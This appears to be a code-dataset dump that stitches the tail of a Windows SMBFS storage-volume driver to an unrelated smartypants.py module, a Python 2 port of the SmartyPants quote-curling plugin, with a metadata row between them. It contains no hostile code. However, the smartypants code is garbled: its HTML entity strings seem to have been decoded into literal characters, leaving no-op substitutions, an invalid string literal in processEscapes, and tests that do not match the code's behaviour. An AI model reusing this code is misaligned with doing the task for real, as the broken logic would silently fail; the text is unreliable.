self._remotefsclient = remotefs.WindowsRemoteFsClient(
'cifs', root_helper=None, smbfs_mount_point_base=self.base,
smbfs_mount_options=opts)
self.vhdutils = vhdutils.VHDUtils()
def do_setup(self, context):
self._check_os_platform()
super(WindowsSmbfsDriver, self).do_setup(context)
def _check_os_platform(self):
if sys.platform != 'win32':
_msg = _("This system platform (%s) is not supported. This "
"driver supports only Win32 platforms.") % sys.platform
raise exception.SmbfsException(_msg)
def _do_create_volume(self, volume):
volume_path = self.local_path(volume)
volume_format = self.get_volume_format(volume)
volume_size_bytes = volume['size'] * units.Gi
if os.path.exists(volume_path):
err_msg = _('File already exists at: %s') % volume_path
raise exception.InvalidVolume(err_msg)
if volume_format not in (self._DISK_FORMAT_VHD,
self._DISK_FORMAT_VHDX):
err_msg = _("Unsupported volume format: %s ") % volume_format
raise exception.InvalidVolume(err_msg)
self.vhdutils.create_dynamic_vhd(volume_path, volume_size_bytes)
def _ensure_share_mounted(self, smbfs_share):
mnt_options = {}
if self.shares.get(smbfs_share) is not None:
mnt_flags = self.shares[smbfs_share]
mnt_options = self.parse_options(mnt_flags)[1]
self._remotefsclient.mount(smbfs_share, mnt_options)
def _delete(self, path):
fileutils.delete_if_exists(path)
def _get_capacity_info(self, smbfs_share):
"""Calculate available space on the SMBFS share.
:param smbfs_share: example //172.18.194.100/var/smbfs
"""
total_size, total_available = self._remotefsclient.get_capacity_info(
smbfs_share)
total_allocated = self._get_total_allocated(smbfs_share)
return_value = [total_size, total_available, total_allocated]
LOG.info('Smb share %s Total size %s Total allocated %s'
% (smbfs_share, total_size, total_allocated))
return [float(x) for x in return_value]
def _get_total_allocated(self, smbfs_share):
elements = os.listdir(smbfs_share)
total_allocated = 0
for element in elements:
element_path = os.path.join(smbfs_share, element)
if not self._remotefsclient.is_symlink(element_path):
if "snapshot" in element:
continue
if re.search(r'\.vhdx?$', element):
total_allocated += self.vhdutils.get_vhd_size(
element_path)['VirtualSize']
continue
if os.path.isdir(element_path):
total_allocated += self._get_total_allocated(element_path)
continue
total_allocated += os.path.getsize(element_path)
return total_allocated
def _img_commit(self, snapshot_path):
self.vhdutils.merge_vhd(snapshot_path)
self._delete(snapshot_path)
def _rebase_img(self, image, backing_file, volume_format):
# Relative path names are not supported in this case.
image_dir = os.path.dirname(image)
backing_file_path = os.path.join(image_dir, backing_file)
self.vhdutils.reconnect_parent(image, backing_file_path)
def _qemu_img_info(self, path, volume_name=None):
# This code expects to deal only with relative filenames.
# As this method is needed by the upper class and qemu-img does
# not fully support vhdx images, for the moment we'll use Win32 API
# for retrieving image information.
parent_path = self.vhdutils.get_vhd_parent_path(path)
file_format = os.path.splitext(path)[1][1:].lower()
if parent_path:
backing_file_name = os.path.split(parent_path)[1].lower()
else:
backing_file_name = None
class ImageInfo(object):
def __init__(self, image, backing_file):
self.image = image
self.backing_file = backing_file
self.file_format = file_format
return ImageInfo(os.path.basename(path),
backing_file_name)
def _do_create_snapshot(self, snapshot, backing_file, new_snap_path):
backing_file_full_path = os.path.join(
self._local_volume_dir(snapshot['volume']),
backing_file)
self.vhdutils.create_differencing_vhd(new_snap_path,
backing_file_full_path)
def _do_extend_volume(self, volume_path, size_gb):
self.vhdutils.resize_vhd(volume_path, size_gb * units.Gi)
@utils.synchronized('smbfs', external=False)
def copy_volume_to_image(self, context, volume, image_service, image_meta):
"""Copy the volume to the specified image."""
# If snapshots exist, flatten to a temporary image, and upload it
active_file = self.get_active_image_from_info(volume)
active_file_path = os.path.join(self._local_volume_dir(volume),
active_file)
backing_file = self.vhdutils.get_vhd_parent_path(active_file_path)
root_file_fmt = self.get_volume_format(volume)
temp_path = None
try:
if backing_file or root_file_fmt == self._DISK_FORMAT_VHDX:
temp_file_name = '%s.temp_image.%s.%s' % (
volume['id'],
image_meta['id'],
self._DISK_FORMAT_VHD)
temp_path = os.path.join(self._local_volume_dir(volume),
temp_file_name)
self.vhdutils.convert_vhd(active_file_path, temp_path)
upload_path = temp_path
else:
upload_path = active_file_path
image_utils.upload_volume(context,
image_service,
image_meta,
upload_path,
self._DISK_FORMAT_VHD)
finally:
if temp_path:
self._delete(temp_path)
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
volume_format = self.get_volume_format(volume, qemu_format=True)
image_meta = image_service.show(context, image_id)
fetch_format = volume_format
fetch_path = self.local_path(volume)
self._delete(fetch_path)
qemu_version = self.get_qemu_version()
needs_conversion = False
if (qemu_version < [1, 7] and (
volume_format == self._DISK_FORMAT_VHDX and
image_meta['disk_format'] != self._DISK_FORMAT_VHDX)):
needs_conversion = True
fetch_format = 'vpc'
temp_file_name = '%s.temp_image.%s.%s' % (
volume['id'],
image_meta['id'],
self._DISK_FORMAT_VHD)
fetch_path = os.path.join(self._local_volume_dir(volume),
temp_file_name)
image_utils.fetch_to_volume_format(
context, image_service, image_id,
fetch_path, fetch_format,
self.configuration.volume_dd_blocksize)
if needs_conversion:
self.vhdutils.convert_vhd(fetch_path, self.local_path(volume))
self._delete(fetch_path)
self.vhdutils.resize_vhd(self.local_path(volume),
volume['size'] * units.Gi)
def _copy_volume_from_snapshot(self, snapshot, volume, volume_size):
"""Copy data from snapshot to destination volume."""
LOG.debug("snapshot: %(snap)s, volume: %(vol)s, "
"volume_size: %(size)s" %
{'snap': snapshot['id'],
'vol': volume['id'],
'size': snapshot['volume_size']})
info_path = self._local_path_volume_info(snapshot['volume'])
snap_info = self._read_info_file(info_path)
vol_dir = self._local_volume_dir(snapshot['volume'])
forward_file = snap_info[snapshot['id']]
forward_path = os.path.join(vol_dir, forward_file)
# Find the file which backs this file, which represents the point
# when this snapshot was created.
img_info = self._qemu_img_info(forward_path)
snapshot_path = os.path.join(vol_dir, img_info.backing_file)
volume_path = self.local_path(volume)
self._delete(volume_path)
self.vhdutils.convert_vhd(snapshot_path,
volume_path)
self.vhdutils.resize_vhd(volume_path, volume_size * units.Gi)
| apache-2.0 | 1,899,625,683,295,123,000 | 39.201493 | 79 | 0.591981 | false |
hellobond/python-smartypants | lib/smartypants.py | 1 | 34216 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""
==============
smartypants.py
==============
----------------------------
SmartyPants ported to Python
----------------------------
Ported by `Chad Miller`_
Copyright (c) 2004, 2007 Chad Miller
original `SmartyPants`_ by `John Gruber`_
Copyright (c) 2003 John Gruber
Synopsis
========
A smart-quotes plugin for Pyblosxom_.
The priginal "SmartyPants" is a free web publishing plug-in for Movable Type,
Blosxom, and BBEdit that easily translates plain ASCII punctuation characters
into "smart" typographic punctuation HTML entities.
This software, *smartypants.py*, endeavours to be a functional port of
SmartyPants to Python, for use with Pyblosxom_.
Description
===========
SmartyPants can perform the following transformations:
- Straight quotes ( " and ' ) into "curly" quote HTML entities
- Backticks-style quotes (\`\`like this'') into "curly" quote HTML entities
- Dashes (``--`` and ``---``) into en- and em-dash entities
- Three consecutive dots (``...`` or ``. . .``) into an ellipsis entity
This means you can write, edit, and save your posts using plain old
ASCII straight quotes, plain dashes, and plain dots, but your published
posts (and final HTML output) will appear with smart quotes, em-dashes,
and proper ellipses.
SmartyPants does not modify characters within ``<pre>``, ``<code>``, ``<tt>``,
``<kbd>``, ``<math>`` or ``<script>`` tag blocks. Typically, these tags are
used to display text where smart quotes and other "smart punctuation" would
not be appropriate, such as source code or example markup.
Backslash Escapes
=================
By default escapes are not processed. The process escapes, the
`process_escapes=True` keyword argument must be passed. See below for a
description of what this does.
If you need to use literal straight quotes (or plain hyphens and
periods), SmartyPants accepts the following backslash escape sequences
to force non-smart punctuation. It does so by transforming the escape
sequence into a decimal-encoded HTML entity:
(FIXME: table here.)
.. comment It sucks that there's a disconnect between the visual layout and table markup when special characters are involved.
.. comment ====== ===== =========
.. comment Escape Value Character
.. comment ====== ===== =========
.. comment \\\\\\\\ \ \\\\
.. comment \\\\" " "
.. comment \\\\' ' '
.. comment \\\\. . .
.. comment \\\\- - \-
.. comment \\\\` ` \`
.. comment ====== ===== =========
This is useful, for example, when you want to use straight quotes as
foot and inch marks: 6'2" tall; a 17" iMac.
Options
=======
For Pyblosxom users, the ``smartypants_attributes`` attribute is where you
specify configuration options.
Numeric values are the easiest way to configure SmartyPants' behavior:
"0"
Suppress all transformations. (Do nothing.)
"1"
Performs default SmartyPants transformations: quotes (including
\`\`backticks'' -style), em-dashes, and ellipses. "``--``" (dash dash)
is used to signify an em-dash; there is no support for en-dashes.
"2"
Same as smarty_pants="1", except that it uses the old-school typewriter
shorthand for dashes: "``--``" (dash dash) for en-dashes, "``---``"
(dash dash dash)
for em-dashes.
"3"
Same as smarty_pants="2", but inverts the shorthand for dashes:
"``--``" (dash dash) for em-dashes, and "``---``" (dash dash dash) for
en-dashes.
"-1"
Stupefy mode. Reverses the SmartyPants transformation process, turning
the HTML entities produced by SmartyPants into their ASCII equivalents.
E.g. "“" is turned into a simple double-quote ("), "—" is
turned into two dashes, etc.
Additionally, shorthands that are specific to Bond can be used to configure
the behavior of SmartyPants':
"B1"
Performs the following transformations: single (``'``) and double (``"``)
quotes. There is not support for bacticks, dashes (en- and em-), or
ellipses.
The following single-character attribute values can be combined to toggle
individual transformations from within the smarty_pants attribute. For
example, to educate normal quotes and em-dashes, but not ellipses or
\`\`backticks'' -style quotes:
``py['smartypants_attributes'] = "1"``
"q"
Educates normal quote characters: (") and (').
"b"
Educates \`\`backticks'' -style double quotes.
"B"
Educates \`\`backticks'' -style double quotes and \`single' quotes.
"d"
Educates em-dashes.
"D"
Educates em-dashes and en-dashes, using old-school typewriter shorthand:
(dash dash) for en-dashes, (dash dash dash) for em-dashes.
"i"
Educates em-dashes and en-dashes, using inverted old-school typewriter
shorthand: (dash dash) for em-dashes, (dash dash dash) for en-dashes.
"e"
Educates ellipses.
"w"
Translates any instance of ``"`` into a normal double-quote character.
This should be of no interest to most people, but of particular interest
to anyone who writes their posts using Dreamweaver, as Dreamweaver
inexplicably uses this entity to represent a literal double-quote
character. SmartyPants only educates normal quotes, not entities (because
ordinarily, entities are used for the explicit purpose of representing the
specific character they represent). The "w" option must be used in
conjunction with one (or both) of the other quote options ("q" or "b").
Thus, if you wish to apply all SmartyPants transformations (quotes, en-
and em-dashes, and ellipses) and also translate ``"`` entities into
regular quotes so SmartyPants can educate them, you should pass the
following to the smarty_pants attribute:
The ``smartypants_forbidden_flavours`` list contains pyblosxom flavours for
which no Smarty Pants rendering will occur.
Caveats
=======
Why You Might Not Want to Use Smart Quotes in Your Weblog
---------------------------------------------------------
For one thing, you might not care.
Most normal, mentally stable individuals do not take notice of proper
typographic punctuation. Many design and typography nerds, however, break
out in a nasty rash when they encounter, say, a restaurant sign that uses
a straight apostrophe to spell "Joe's".
If you're the sort of person who just doesn't care, you might well want to
continue not caring. Using straight quotes -- and sticking to the 7-bit
ASCII character set in general -- is certainly a simpler way to live.
Even if you *do* care about accurate typography, you still might want to
think twice before educating the quote characters in your weblog. One side
effect of publishing curly quote HTML entities is that it makes your
weblog a bit harder for others to quote from using copy-and-paste. What
happens is that when someone copies text from your blog, the copied text
contains the 8-bit curly quote characters (as well as the 8-bit characters
for em-dashes and ellipses, if you use these options). These characters
are not standard across different text encoding methods, which is why they
need to be encoded as HTML entities.
People copying text from your weblog, however, may not notice that you're
using curly quotes, and they'll go ahead and paste the unencoded 8-bit
characters copied from their browser into an email message or their own
weblog. When pasted as raw "smart quotes", these characters are likely to
get mangled beyond recognition.
That said, my own opinion is that any decent text editor or email client
makes it easy to stupefy smart quote characters into their 7-bit
equivalents, and I don't consider it my problem if you're using an
indecent text editor or email client.
Algorithmic Shortcomings
------------------------
One situation in which quotes will get curled the wrong way is when
apostrophes are used at the start of leading contractions. For example:
``'Twas the night before Christmas.``
In the case above, SmartyPants will turn the apostrophe into an opening
single-quote, when in fact it should be a closing one. I don't think
this problem can be solved in the general case -- every word processor
I've tried gets this wrong as well. In such cases, it's best to use the
proper HTML entity for closing single-quotes (``’``) by hand.
Bugs
====
To file bug reports or feature requests (other than topics listed in the
Caveats section above) please send email to: mailto:[email protected]
If the bug involves quotes being curled the wrong way, please send example
text to illustrate.
To Do list
----------
- Provide a function for use within templates to quote anything at all.
Version History
===============
1.5_2.1: Fri, 24 Oct 2014, 18:53:25 -0400
- Added option to process escapes. By default backslash escapes will
not be processed.
1.5_2.0: Thu, 04 Sep 2014 12:31:22 -0400
- Added unicode output option and added new attributes (Bond usage cases).
Note that version number jumps to reflect fork implementations.
1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400
- Fixed bug where blocks of precious unalterable text was instead
interpreted. Thanks to Le Roux and Dirk van Oosterbosch.
1.5_1.5: Sat, 13 Aug 2005 15:50:24 -0400
- Fix bogus magical quotation when there is no hint that the
user wants it, e.g., in "21st century". Thanks to Nathan Hamblen.
- Be smarter about quotes before terminating numbers in an en-dash'ed
range.
1.5_1.4: Thu, 10 Feb 2005 20:24:36 -0500
- Fix a date-processing bug, as reported by jacob childress.
- Begin a test-suite for ensuring correct output.
- Removed import of "string", since I didn't really need it.
(This was my first every Python program. Sue me!)
1.5_1.3: Wed, 15 Sep 2004 18:25:58 -0400
- Abort processing if the flavour is in forbidden-list. Default of
[ "rss" ] (Idea of Wolfgang SCHNERRING.)
- Remove stray virgules from en-dashes. Patch by Wolfgang SCHNERRING.
1.5_1.2: Mon, 24 May 2004 08:14:54 -0400
- Some single quotes weren't replaced properly. Diff-tesuji played
by Benjamin GEIGER.
1.5_1.1: Sun, 14 Mar 2004 14:38:28 -0500
- Support upcoming pyblosxom 0.9 plugin verification feature.
1.5_1.0: Tue, 09 Mar 2004 08:08:35 -0500
- Initial release
Version Information
-------------------
Version numbers will track the SmartyPants_ version numbers, with the addition
of an underscore and the smartypants.py version on the end.
New versions will be available at `http://wiki.chad.org/SmartyPantsPy`_
.. _http://wiki.chad.org/SmartyPantsPy: http://wiki.chad.org/SmartyPantsPy
Authors
=======
`John Gruber`_ did all of the hard work of writing this software in Perl for
`Movable Type`_ and almost all of this useful documentation. `Chad Miller`_
ported it to Python to use with Pyblosxom_.
Additional Credits
==================
Portions of the SmartyPants original work are based on Brad Choate's nifty
MTRegex plug-in. `Brad Choate`_ also contributed a few bits of source code to
this plug-in. Brad Choate is a fine hacker indeed.
`Jeremy Hedley`_ and `Charles Wiltgen`_ deserve mention for exemplary beta
testing of the original SmartyPants.
`Rael Dornfest`_ ported SmartyPants to Blosxom.
.. _Brad Choate: http://bradchoate.com/
.. _Jeremy Hedley: http://antipixel.com/
.. _Charles Wiltgen: http://playbacktime.com/
.. _Rael Dornfest: http://raelity.org/
Copyright and License
=====================
SmartyPants_ license::
Copyright (c) 2003 John Gruber
(http://daringfireball.net/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name "SmartyPants" nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
smartypants.py license::
smartypants.py is a derivative work of SmartyPants.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
This software is provided by the copyright holders and contributors "as
is" and any express or implied warranties, including, but not limited
to, the implied warranties of merchantability and fitness for a
particular purpose are disclaimed. In no event shall the copyright
owner or contributors be liable for any direct, indirect, incidental,
special, exemplary, or consequential damages (including, but not
limited to, procurement of substitute goods or services; loss of use,
data, or profits; or business interruption) however caused and on any
theory of liability, whether in contract, strict liability, or tort
(including negligence or otherwise) arising in any way out of the use
of this software, even if advised of the possibility of such damage.
.. _John Gruber: http://daringfireball.net/
.. _Chad Miller: http://web.chad.org/
.. _Pyblosxom: http://roughingit.subtlehints.net/pyblosxom
.. _SmartyPants: http://daringfireball.net/projects/smartypants/
.. _Movable Type: http://www.movabletype.org/
"""
# TODO: Add usage examples
default_smartypants_attr = "B1" # Like a BOSS!
import re
import htmlentitydefs
tags_to_skip_regex = re.compile(r"<(/)?(pre|code|tt|kbd|script|math)[^>]*>", re.I)
def verify_installation(request):
return 1
# assert the plugin is functional
def cb_story(args):
global default_smartypants_attr
try:
forbidden_flavours = args["entry"]["smartypants_forbidden_flavours"]
except KeyError:
forbidden_flavours = [ "rss" ]
try:
attributes = args["entry"]["smartypants_attributes"]
except KeyError:
attributes = default_smartypants_attr
if attributes is None:
attributes = default_smartypants_attr
entryData = args["entry"].getData()
try:
if args["request"]["flavour"] in forbidden_flavours:
return
except KeyError:
if "<" in args["entry"]["body"][0:15]: # sniff the stream
return # abort if it looks like escaped HTML. FIXME
# FIXME: make these configurable, perhaps?
args["entry"]["body"] = smartyPants(entryData, attributes)
args["entry"]["title"] = smartyPants(args["entry"]["title"], attributes)
### interal functions below here
def smartyPants(text, attr=default_smartypants_attr, **kwargs):
"""Docstring.
Parameters
----------
unicode : bool
convert to unicode. If True a unicode string is returned (if required?)
and if False an HTML encoded string is returned.
"""
convert_quot = False # should we translate " entities into normal quotes?
# Parse attributes:
# 0 : do nothing
# 1 : set all
# 2 : set all, using old school en- and em- dash shortcuts
# 3 : set all, using inverted old school en and em- dash shortcuts
#
# q : quotes
# b : backtick quotes (``double'' only)
# B : backtick quotes (``double'' and `single')
# d : dashes
# D : old school dashes
# i : inverted old school dashes
# e : ellipses
# w : convert " entities to " for Dreamweaver users
skipped_tag_stack = []
do_dashes = "0"
do_backticks = "0"
do_quotes = "0"
do_ellipses = "0"
do_stupefy = "0"
if attr == "0":
# Do nothing.
return text
elif attr == "1":
do_quotes = "1"
do_backticks = "1"
do_dashes = "1"
do_ellipses = "1"
elif attr == "2":
# Do everything, turn all options on, use old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "2"
do_ellipses = "1"
elif attr == "3":
# Do everything, turn all options on, use inverted old school dash shorthand.
do_quotes = "1"
do_backticks = "1"
do_dashes = "3"
do_ellipses = "1"
elif attr == "-1":
# Special "stupefy" mode.
do_stupefy = "1"
# BOND Shorthands
elif attr == "B1":
do_quotes = "1"
else:
for c in attr:
if c == "q": do_quotes = "1"
elif c == "b": do_backticks = "1"
elif c == "B": do_backticks = "2"
elif c == "d": do_dashes = "1"
elif c == "D": do_dashes = "2"
elif c == "i": do_dashes = "3"
elif c == "e": do_ellipses = "1"
elif c == "w": convert_quot = "1"
else:
pass
# ignore unknown option
tokens = _tokenize(text)
result = []
in_pre = False
prev_token_last_char = ""
# This is a cheat, used to get some context
# for one-character tokens that consist of
# just a quote char. What we do is remember
# the last character of the previous text
# token, to use as context to curl single-
# character quote tokens correctly.
for cur_token in tokens:
if cur_token[0] == "tag":
# Don't mess with quotes inside some tags. This does not handle self <closing/> tags!
result.append(cur_token[1])
skip_match = tags_to_skip_regex.match(cur_token[1])
if skip_match is not None:
if not skip_match.group(1):
skipped_tag_stack.append(skip_match.group(2).lower())
in_pre = True
else:
if len(skipped_tag_stack) > 0:
if skip_match.group(2).lower() == skipped_tag_stack[-1]:
skipped_tag_stack.pop()
else:
pass
# This close doesn't match the open. This isn't XHTML. We should barf here.
if len(skipped_tag_stack) == 0:
in_pre = False
else:
t = cur_token[1]
last_char = t[-1:] # Remember last char of this token before processing.
if not in_pre:
oldstr = t
if kwargs.get('process_escapes', False): # only process escapes if requested.
t = processEscapes(t)
if convert_quot != "0":
t = re.sub('"', '"', t)
if do_dashes != "0":
if do_dashes == "1":
t = educateDashes(t)
if do_dashes == "2":
t = educateDashesOldSchool(t)
if do_dashes == "3":
t = educateDashesOldSchoolInverted(t)
if do_ellipses != "0":
t = educateEllipses(t)
# Note: backticks need to be processed before quotes.
if do_backticks != "0":
t = educateBackticks(t)
if do_backticks == "2":
t = educateSingleBackticks(t)
if do_quotes != "0":
if t == "'":
# Special case: single-character ' token
if re.match("\S", prev_token_last_char):
t = "’"
else:
t = "‘"
elif t == '"':
# Special case: single-character " token
if re.match("\S", prev_token_last_char):
t = "”"
else:
t = "“"
else:
# Normal case:
t = educateQuotes(t)
if do_stupefy == "1":
t = stupefyEntities(t)
prev_token_last_char = last_char
result.append(t)
output_text = "".join(result)
if kwargs.get('unicode'):
output_text = unescape_html(output_text)
return output_text
def educateQuotes(str):
"""
Parameter: String.
Returns: The string, with "educated" curly quote HTML entities.
Example input: "Isn't this fun?"
Example output: “Isn’t this fun?”
"""
oldstr = str
punct_class = r"""[!"#\$\%'()*+,-.\/:;<=>?\@\[\\\]\^_`{|}~]"""
# Special case if the very first character is a quote
# followed by punctuation at a non-word-break. Close the quotes by brute force:
str = re.sub(r"""^'(?=%s\\B)""" % (punct_class,), r"""’""", str)
str = re.sub(r"""^"(?=%s\\B)""" % (punct_class,), r"""”""", str)
# Special case for double sets of quotes, e.g.:
# <p>He said, "'Quoted' words in a larger quote."</p>
str = re.sub(r""""'(?=\w)""", """“‘""", str)
str = re.sub(r"""'"(?=\w)""", """‘“""", str)
# Special case for decade abbreviations (the '80s):
str = re.sub(r"""\b'(?=\d{2}s)""", r"""’""", str)
close_class = r"""[^\ \t\r\n\[\{\(\-]"""
dec_dashes = r"""–|—"""
# Get most opening single quotes:
opening_single_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
| # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
' # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_single_quotes_regex.sub(r"""\1‘""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(?!\s | s\b | \d)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’""", str)
closing_single_quotes_regex = re.compile(r"""
(%s)
'
(\s | s\b)
""" % (close_class,), re.VERBOSE)
str = closing_single_quotes_regex.sub(r"""\1’\2""", str)
# Any remaining single quotes should be opening ones:
str = re.sub(r"""'""", r"""‘""", str)
# Get most opening double quotes:
opening_double_quotes_regex = re.compile(r"""
(
\s | # a whitespace char, or
| # a non-breaking space entity, or
-- | # dashes, or
&[mn]dash; | # named dash entities
%s | # or decimal entities
&\#x201[34]; # or hex
)
" # the quote
(?=\w) # followed by a word character
""" % (dec_dashes,), re.VERBOSE)
str = opening_double_quotes_regex.sub(r"""\1“""", str)
# Double closing quotes:
closing_double_quotes_regex = re.compile(r"""
#(%s)? # character that indicates the quote should be closing
"
(?=\s)
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""”""", str)
closing_double_quotes_regex = re.compile(r"""
(%s) # character that indicates the quote should be closing
"
""" % (close_class,), re.VERBOSE)
str = closing_double_quotes_regex.sub(r"""\1”""", str)
# Any remaining quotes should be opening ones.
str = re.sub(r'"', r"""“""", str)
return str
def educateBackticks(str):
"""
Parameter: String.
Returns: The string, with ``backticks'' -style double quotes
translated into HTML curly quote entities.
Example input: ``Isn't this fun?''
Example output: “Isn't this fun?”
"""
str = re.sub(r"""``""", r"""“""", str)
str = re.sub(r"""''""", r"""”""", str)
return str
def educateSingleBackticks(str):
"""
Parameter: String.
Returns: The string, with `backticks' -style single quotes
translated into HTML curly quote entities.
Example input: `Isn't this fun?'
Example output: ‘Isn’t this fun?’
"""
str = re.sub(r"""`""", r"""‘""", str)
str = re.sub(r"""'""", r"""’""", str)
return str
def educateDashes(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""–""", str) # en (yes, backwards)
str = re.sub(r"""--""", r"""—""", str) # em (yes, backwards)
return str
def educateDashesOldSchool(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an en-dash HTML entity, and each "---" translated to
an em-dash HTML entity.
"""
str = re.sub(r"""---""", r"""—""", str) # em (yes, backwards)
str = re.sub(r"""--""", r"""–""", str) # en (yes, backwards)
return str
def educateDashesOldSchoolInverted(str):
"""
Parameter: String.
Returns: The string, with each instance of "--" translated to
an em-dash HTML entity, and each "---" translated to
an en-dash HTML entity. Two reasons why: First, unlike the
en- and em-dash syntax supported by
EducateDashesOldSchool(), it's compatible with existing
entries written before SmartyPants 1.1, back when "--" was
only used for em-dashes. Second, em-dashes are more
common than en-dashes, and so it sort of makes sense that
the shortcut should be shorter to type. (Thanks to Aaron
Swartz for the idea.)
"""
str = re.sub(r"""---""", r"""–""", str) # em
str = re.sub(r"""--""", r"""—""", str) # en
return str
def educateEllipses(str):
"""
Parameter: String.
Returns: The string, with each instance of "..." translated to
an ellipsis HTML entity.
Example input: Huh...?
Example output: Huh…?
"""
str = re.sub(r"""\.\.\.""", r"""…""", str)
str = re.sub(r"""\. \. \.""", r"""…""", str)
return str
def stupefyEntities(str):
"""
Parameter: String.
Returns: The string, with each SmartyPants HTML entity translated to
its ASCII counterpart.
Example input: “Hello — world.”
Example output: "Hello -- world."
"""
str = re.sub(r"""–""", r"""-""", str) # en-dash
str = re.sub(r"""—""", r"""--""", str) # em-dash
str = re.sub(r"""‘""", r"""'""", str) # open single quote
str = re.sub(r"""’""", r"""'""", str) # close single quote
str = re.sub(r"""“""", r'''"''', str) # open double quote
str = re.sub(r"""”""", r'''"''', str) # close double quote
str = re.sub(r"""…""", r"""...""", str)# ellipsis
return str
def processEscapes(str):
r"""
Parameter: String.
Returns: The string, with after processing the following backslash
escape sequences. This is useful if you want to force a "dumb"
quote or other character to appear.
Escape Value
------ -----
\\ \
\" "
\' '
\. .
\- -
\` `
"""
str = re.sub(r"""\\\\""", r"""\""", str)
str = re.sub(r'''\\"''', r""""""", str)
str = re.sub(r"""\\'""", r"""'""", str)
str = re.sub(r"""\\\.""", r""".""", str)
str = re.sub(r"""\\-""", r"""-""", str)
str = re.sub(r"""\\`""", r"""`""", str)
return str
def _tokenize(str):
"""
Parameter: String containing HTML markup.
Returns: Reference to an array of the tokens comprising the input
string. Each token is either a tag (possibly with nested,
tags contained therein, such as <a href="<MTFoo>">, or a
run of text between tags. Each element of the array is a
two-element array; the first is either 'tag' or 'text';
the second is the actual value.
Based on the _tokenize() subroutine from Brad Choate's MTRegex plugin.
<http://www.bradchoate.com/past/mtregex.php>
"""
pos = 0
length = len(str)
tokens = []
depth = 6
nested_tags = "|".join(['(?:<(?:[^<>]',] * depth) + (')*>)' * depth)
#match = r"""(?: <! ( -- .*? -- \s* )+ > ) | # comments
# (?: <\? .*? \?> ) | # directives
# %s # nested tags """ % (nested_tags,)
tag_soup = re.compile(r"""([^<]*)(<[^>]*>)""")
token_match = tag_soup.search(str)
previous_end = 0
while token_match is not None:
if token_match.group(1):
tokens.append(['text', token_match.group(1)])
tokens.append(['tag', token_match.group(2)])
previous_end = token_match.end()
token_match = tag_soup.search(str, token_match.end())
if previous_end < len(str):
tokens.append(['text', str[previous_end:]])
return tokens
### New Functions
def unescape_html(text):
"""Replaces HTML/XML character references in a string with unicode
encodings.
SRC: http://effbot.org/zone/re-sub.htm#unescape-html
`October 28, 2006 | Fredrik Lundh`
:param text: HTML/XML encoded source text
:rtype: string or unicode (if necessary)
"""
def fixup(m):
text = m.group(0)
if text[:2] == "&#":
# character reference
try:
if text[:3] == "&#x":
return unichr(int(text[3:-1], 16))
else:
return unichr(int(text[2:-1]))
except ValueError:
pass
else:
# named entity
try:
text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
except KeyError:
pass
return text # leave as is
return re.sub("&#?\w+;", fixup, text)
if __name__ == "__main__":
import locale
try:
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_string
docstring_html = publish_string(__doc__, writer_name='html')
print docstring_html
# Unit test output goes out stderr. No worries.
import unittest
sp = smartyPants
class TestSmartypantsAllAttributes(unittest.TestCase):
# the default attribute is "1", which means "all".
def test_dates(self):
self.assertEqual(sp("1440-80's"), "1440-80’s")
self.assertEqual(sp("1440-'80s"), "1440-‘80s")
self.assertEqual(sp("1440---'80s"), "1440–‘80s")
self.assertEqual(sp("1960s"), "1960s") # no effect.
self.assertEqual(sp("1960's"), "1960’s")
self.assertEqual(sp("one two '60s"), "one two ‘60s")
self.assertEqual(sp("'60s"), "‘60s")
def test_skip_tags(self):
self.assertEqual(
sp("""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>"""),
"""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>""")
self.assertEqual(
sp("""<p>He said "Let's write some code." This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>"""),
"""<p>He said “Let’s write some code.” This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>""")
def test_ordinal_numbers(self):
self.assertEqual(sp("21st century"), "21st century") # no effect.
self.assertEqual(sp("3rd"), "3rd") # no effect.
def test_educated_quotes(self):
self.assertEqual(sp('''"Isn't this fun?"'''), '''“Isn’t this fun?”''')
unittest.main()
__author__ = "Anthony O'Brien <[email protected]>"
__version__ = "1.5_2.0"
__url__ = "https://github.com/bondgifts/python-smartypants"
